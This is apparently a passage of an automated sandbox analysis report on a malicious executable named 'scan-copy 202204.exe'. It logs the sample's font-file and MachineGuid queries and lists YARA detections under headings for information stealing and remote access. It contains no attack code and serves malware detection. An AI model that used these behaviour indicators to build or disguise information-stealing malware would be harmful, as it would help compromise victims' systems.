            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.0.scan-copy 202204.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.scan-copy 202204.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.350851832.000000000422E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.346977202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.417985848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418441297.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.522775932.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.525132874.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.380882775.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.405802812.000000000EAF5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.418321488.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
